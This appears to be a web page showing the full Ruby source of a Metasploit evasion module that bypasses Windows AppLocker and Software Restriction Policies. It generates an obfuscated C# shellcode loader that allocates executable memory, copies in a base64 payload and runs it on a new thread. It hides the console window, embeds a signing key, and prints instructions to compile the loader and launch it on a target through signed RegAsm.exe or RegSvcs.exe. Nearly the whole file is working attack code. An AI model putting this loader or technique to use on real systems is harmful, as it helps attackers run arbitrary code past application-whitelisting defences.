CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/evasion/windows/applocker_evasion_regasm_regsvcs.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Evasion

7


8
  def initialize(info = {})

9
    super(update_info(info,

10
      'Name'        => 'Applocker Evasion - Microsoft .NET Assembly Registration Utility',

11
      'Description' => %(

12
         This module will assist you in evading Microsoft

13
         Windows Applocker and Software Restriction Policies.

14
         This technique utilises the Microsoft signed binaries

15
         RegAsm.exe or RegSvcs.exe to execute user supplied code.

16
                        ),

17
      'Author'      =>

18
      [

19
        'Nick Tyrer <@NickTyrer>', # module development

20
        'Casey Smith' # regasm_regsvcs bypass research

21
      ],

22
      'License'     => 'MSF_LICENSE',

23
      'Platform'    => 'win',

24
      'Arch'        => [ARCH_X86, ARCH_X64],

25
      'Targets'     => [['Microsoft Windows', {}]],

26
      'References'  => [['URL', 'https://attack.mitre.org/techniques/T1121/']])

27
    )

28


29
    register_options(

30
      [

31
        OptString.new('TXT_FILE', [true, 'Filename for the evasive file (default: regasm_regsvcs.txt)', 'regasm_regsvcs.txt']),

32
        OptString.new('SNK_FILE', [true, 'Filename for the .snk file (default: key.snk)', 'key.snk'])

33
      ]

34
    )

35


36
    deregister_options('FILENAME')

37
  end

38


39
  def build_payload

40
    Rex::Text.encode_base64(payload.encoded)

41
  end

42


43
  def obfu

44
    Rex::Text.rand_text_alpha 8

45
  end

46


47
  def regasm_regsvcs

48
    esc = build_payload

49
    mod = [obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu]

50
    <<~HEREDOC

51
      using System;

52
      using System.EnterpriseServices;

53
      using System.Runtime.InteropServices;

54
      namespace #{mod[0]}

55
      {

56
      public class #{mod[1]} : ServicedComponent

57
      {

58
      [ComRegisterFunction]

59
      public static void RegisterClass(string #{mod[2]})

60
      {

61
      #{mod[3]}.#{mod[14]}();

62
      }

63
      [ComUnregisterFunction]

64
      public static void UnRegisterClass(string #{mod[2]})

65
      {

66
      #{mod[3]}.#{mod[14]}();

67
      }

68
      }

69
      public class #{mod[3]}

70
      {

71
      private static Int32 #{mod[4]}=0x1000;

72
      private static IntPtr #{mod[5]}=(IntPtr)0x40;

73
      private static UInt32 #{mod[6]} = 0xFFFFFFFF;

74
      [System.Runtime.InteropServices.DllImport("kernel32")]

75
      private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);

76
      [System.Runtime.InteropServices.DllImport("kernel32")]

77
      private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);

78
      [System.Runtime.InteropServices.DllImport("kernel32")]

79
      private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);

80
      [System.Runtime.InteropServices.DllImport("user32.dll")]

81
      static extern bool ShowWindow(IntPtr #{mod[7]}, int nCmdShow);

82
      [System.Runtime.InteropServices.DllImport("Kernel32")]

83
      private static extern IntPtr GetConsoleWindow();

84
      const int #{mod[8]} = 0;

85
      public static void #{mod[14]}()

86
      {

87
      IntPtr #{mod[7]};

88
      #{mod[7]} = GetConsoleWindow();

89
      ShowWindow(#{mod[7]}, #{mod[8]});

90
      string #{mod[9]} = "#{esc}";

91
      byte[] #{mod[10]} = Convert.FromBase64String(#{mod[9]});

92
      byte[] #{mod[11]} = #{mod[10]};

93
      IntPtr #{mod[12]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{mod[11]}.Length, #{mod[4]}, #{mod[5]});

94
      System.Runtime.InteropServices.Marshal.Copy(#{mod[11]}, 0, #{mod[12]}, #{mod[11]}.Length);

95
      IntPtr #{mod[13]} = IntPtr.Zero;

96
      WaitForSingleObject(CreateThread(#{mod[13]}, UIntPtr.Zero, #{mod[12]}, #{mod[13]}, 0, ref #{mod[13]}), #{mod[6]});

97
      }

98
      }

99
      }

100
    HEREDOC

101
  end

102


103
  def snk

104
    debaser = 'BwIAAAAkAABSU0EyAAQAAAEAAQD9yIxqf9oJgwLw6nUHqVNq4LaP+/eaL4qTT9K9aV/z7ddCP8+Uf2/47KnHklpaw+eH03ZaA2yKYBA9s+Al0VoyajA76HQp

105
    HDaCgiURBIT2GBLUGwdhoEMWX5J8eoCzkucJEjSsavQh+r9JeB6zcQvoZIx0PrpELgQc8is8j2jvsFuc5LQ8ZFoPk1273TTxKibw84HFESjxJrRtkSjwoEo4OUuZtL3C7fD

106
    gnaSoeLnMwohmyTTjt15zgBZv7xD5u/CHD4/+tySJufY5j0FkBxhyqt2DWHcmH4MQCC6PgYfIuTXEAD35o0cg+6s6pJYKB+DUCrU5vSime3jyWno9vCe87UT+fQcDrKntHB

107
    mjnj9WliAMZlU1IuCWieT7fzGZqqIsd4rrcgxetnWzaWRAkgHcTVkmVPIt0z9zHU71s7CER2viklJkiaZjRQan5ZA7bTqqsuG1xoIyXTWbKsaAMCKf5a4IJS2ImpqaYA9HR

108
    BrIV7be2o0QJxSm1LPqBXJqkAhnCpcYyfve2dql7fF+fAIDGe3ZgCEbJsfYuAaAY0snGJQhUgLmwO8GDbsbMUTuBQspDv8QXsF53UNH5v5dnOKaTfo71LrI+I5zBUqEYP3B

109
    DtK0qryu/J1eq80nPAmpNqRbFnYm1OdGKpgzHS+Ws7obPSt1HG3//BxC3a5znX0evfCfSaaWRswhjvblnh1070b3jkT6nJeksKuuVEHvudAQAtGn2vxNDs4CqrJODi5Z/BA

110
    KgpIZqQeZmh3r4Zb5OI0='

111
    Rex::Text.decode_base64(debaser)

112
  end

113


114
  def file_format_filename(name = '')

115
    name.empty? ? @fname : @fname = name

116
  end

117


118
  def create_files

119
    f1 = datastore['TXT_FILE'].empty? ? 'regasm_regsvcs.txt' : datastore['TXT_FILE']

120
    f1 << '.txt' unless f1.downcase.end_with?('.txt')

121
    f2 = datastore['SNK_FILE'].empty? ? 'key.snk' : datastore['SNK_FILE']

122
    f2 << '.snk' unless f2.downcase.end_with?('.snk')

123
    txt_file = regasm_regsvcs

124
    snk_file = snk

125
    file_format_filename(f1)

126
    file_create(txt_file)

127
    file_format_filename(f2)

128
    file_create(snk_file)

129
  end

130


131
  def instructions

132
    print_status "Copy #{datastore['TXT_FILE']} and #{datastore['SNK_FILE']} to the target"

133
    if payload.arch.first == ARCH_X86

134
      print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:#{datastore['TXT_FILE'].gsub('.txt', '.dll')} /keyfile:#{datastore['SNK_FILE']} #{datastore['TXT_FILE']}"

135
      print_status "Execute using: C:\\Windows\\Microsoft.NET\\Framework\\[.NET Version]\\regsvcs.exe #{datastore['TXT_FILE'].gsub('.txt', '.dll')}"

136
      print_status 'or'

137
      print_status "Execute using: C:\\Windows\\Microsoft.NET\\Framework\\[.NET Version]\\regasm.exe /U #{datastore['TXT_FILE'].gsub('.txt', '.dll')}"

138
    else

139
      print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:#{datastore['TXT_FILE'].gsub('.txt', '.dll')} /keyfile:#{datastore['SNK_FILE']} #{datastore['TXT_FILE']}"

140
      print_status "Execute using: C:\\Windows\\Microsoft.NET\\Framework64\\[.NET Version]\\regsvcs.exe #{datastore['TXT_FILE'].gsub('.txt', '.dll')}"

141
      print_status 'or'

142
      print_status "Execute using: C:\\Windows\\Microsoft.NET\\Framework64\\[.NET Version]\\regasm.exe /U #{datastore['TXT_FILE'].gsub('.txt', '.dll')}"

143
    end

144
  end

145


146
  def run

147
    create_files

148
    instructions

149
  end

150
end

151


152